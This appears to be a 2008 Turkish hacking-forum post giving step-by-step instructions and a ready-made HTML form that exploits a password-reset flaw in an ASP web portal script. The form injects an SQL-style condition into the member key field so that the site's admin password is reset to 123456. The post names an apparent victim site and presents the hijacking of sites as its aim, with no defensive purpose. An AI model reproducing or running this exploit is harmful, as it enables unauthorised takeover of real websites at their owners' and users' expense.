Yöntem: Exploit attack
Kısaca geçiyorum..asp mi php mi daha güvenli bilmiyorum ama
yönetimini ele gecirdigim sitelerin sayısında
asp siteler hep önde gidiyor.işte size örnek bi site..
http://www.ncbbw.com/portalnasıl bir açıgı mı vardı..?site max web portal scriptiydi ve acık kapanmamıstı.
işte yöntemi...
1. not defterinizi açın.
2. aşagıdakini aynen kopyala yapıştır yapın.
3. portalın adresini xxxxx yazan yere yazın
mesela
www.nyCWave.com gibi..
4. şimdi not defterini farklı kaydet yaparak html olarak kaydedin.
5. htlm &??yi açın.ve submit tusuna basın işte bu kadar.sitede eger
acık kapanmadıysa admin şifresi 123456 olacak
6. admin 123456 yaptıktan sonra site elinizde.
7. bu açık sayısı sitelerde hızla kapanıyor.
<form action="http://XXXXX/password.asp?mode=reset" method="post">
<br>
pass1: <input name="pass" type="text" value="123456" size="150"><br>
pass2: <input name="pass2" type="text" value="123456" size="150"><br>
Id: <input name="memId" type="text" value="1" size="150"><br>
Member Key: <input name="memKey" type="text" value="foo&?? or M_Name=&??admin" size="150">
<br>
<input name="Submit(sifreyi deistir)" type="submit" value="Submit">
</form>
Not: Türk sitelerine zarar vermeyin ama..
Alıntıdır, denenmiştir...
DİKKAT: html de ayarları yaptıkdan sonra submite basın aksi halde admin şifresi deişmeyecektir...
Konu: Exploit attack 
Ptsi Mart 31 2008, 20:07
